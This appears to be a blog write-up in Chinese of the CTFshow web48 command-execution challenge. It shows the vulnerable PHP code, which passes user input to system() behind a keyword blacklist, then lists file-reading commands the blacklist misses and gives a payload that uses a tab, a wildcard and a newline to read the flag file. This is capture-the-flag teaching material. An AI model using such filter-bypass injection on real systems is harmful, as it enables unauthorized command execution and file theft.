目录

  • 源码
  • 知识点
  • 题解
  • 总结

源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

知识点

发现nl依然没有被过滤

more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
grep:在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings

题解

?c=nl%09fla?.php%0a

总结

水题

CTFshow 命令执行 web48相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  3. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  4. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  5. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  6. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  7. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  8. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  9. ctfshow命令执行

    目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...

最新文章

  1. python流程控制-python之流程控制
  2. ELK Stack 日志分析 Elasticsearch搜索权限
  3. 服务器重启后,启动SAP ERP的步骤
  4. 怎么向后删除?(删除光标后的字符)(按delete键)
  5. 关于网络投票的反思2018-11-11
  6. LeetCode MySQL 1355. 活动参与者(any函数)
  7. 易语言mysql锁表_MySQL的3种锁定机制
  8. math 计算float_Java Math类静态float min(float f1,float f2)与示例
  9. 2020-2021家居行业年度盘点与趋势洞察
  10. 【转载】Linux等类Unix系统学习用书那点事儿!
  11. java 单链表是否有环_数据结构与算法随笔之链表-链表是否有环(二)
  12. 如何到top5%?NLP文本分类和情感分析竞赛总结
  13. 10+年程序员告诉你职场误区,如何快速提升自己?
  14. WCF 第五章 行为
  15. 怎么用计算机划因果图,计算机软考考试必备知识点:鱼骨图法
  16. Excel怎么忽略位置对比两列数据是否相同
  17. web网页设计期末课程大作业:基于HTML+CSS+JavaScript个人书画作品展示HTML模板(6页)
  18. excel表格打印每页都有表头_如何在Excel打印时每页都有表头?你知道么
  19. excel两个指标相关性分析_用Excel做相关性分析
  20. 微云虚拟化VOS操作系统

热门文章

  1. .NET中DLL“没有可放置在工具箱的组件”—FreeTextBox
  2. CROC-MBTU 2012, Elimination Round (ACM-ICPC) 总结
  3. Replation requires the actual server name ... Replication.Utilies
  4. 移动服务机器人模块选型
  5. AndroidStudio直接通过gradle无mk编译生成so
  6. android camera(二):摄像头工作原理、s5PV310 摄像头接口(CAMIF)
  7. php smtp tls,php – RoundcubePostfix SMTP:SSL例程:SSL3_READ_BYTES:tlsv1 alert unknown ca:s3_pkt.c...
  8. docker中操作系统与应用
  9. 交叉编译Open***-2.4.3
  10. PLSQL Developer连接Oracle数据库